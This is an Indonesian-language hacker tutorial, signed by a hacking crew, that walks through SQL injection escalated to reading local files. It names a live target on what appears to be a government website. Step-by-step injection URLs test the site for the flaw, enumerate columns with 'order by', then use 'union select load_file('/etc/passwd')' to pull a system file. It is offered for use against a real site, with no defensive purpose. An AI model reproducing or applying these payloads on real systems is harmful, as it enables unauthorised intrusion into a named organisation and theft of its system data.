Assalamualaikum kali ini saya akan materi sql to lfi
Bahan?
->Payload Lfi load_file(‘/etc/passwd’)
-> Live Target : http://tf.lan.go.id/statis-1-profil.html
Oke lgsung saja Lanjut ke tutor sql to lfi nya
Seperti biasa pertama² kita kasih ( ‘ ) untuk cek vuln atau tidak
Contoh
http://tf.lan.go.id/statis-1′-profil.html
Nah kasih ( ‘ ) nya sesudah angka
Terus lu search ke google/crome maka akan menjadi seperti ini
Lalu kalian tambahkan order+by nya
Contoh : http://tf.lan.go.id/statis-1’+order+by+1–+–profil.html
Maka akan menjadi seperti ini
Nah disini error,lalu langsng aja kita ganti order+by nya menjadi union+select
Contoh : http://tf.lan.go.id/statis-1’+union+select–+–profil.html
Hapus aja angka 1 nya
Maka akan menjadi seperti ini
Nah,lalu kalian masukin payload nya
Contoh : http://tf.lan.go.id/statis-1’+union+select+load_file(‘/etc/passwd’)–+–profil.html
maka akan menjadi seperti ini
Nah sudah itu kalian tinggal view-source aja biar muncul hasilnya:v
Contoh : view-source:tf.lan.go.id/statis-1’+union+select+load_file(‘/etc/passwd’)–+–profil.html
Nah maka akan menjadi seperti ini
Duar MWMWK boom:v
SUPPORT TERUS P5XPLOITERCREW YAK
Ok sekian materi dari saya ArdhyanX…
Pangkoh6etarXsecurity 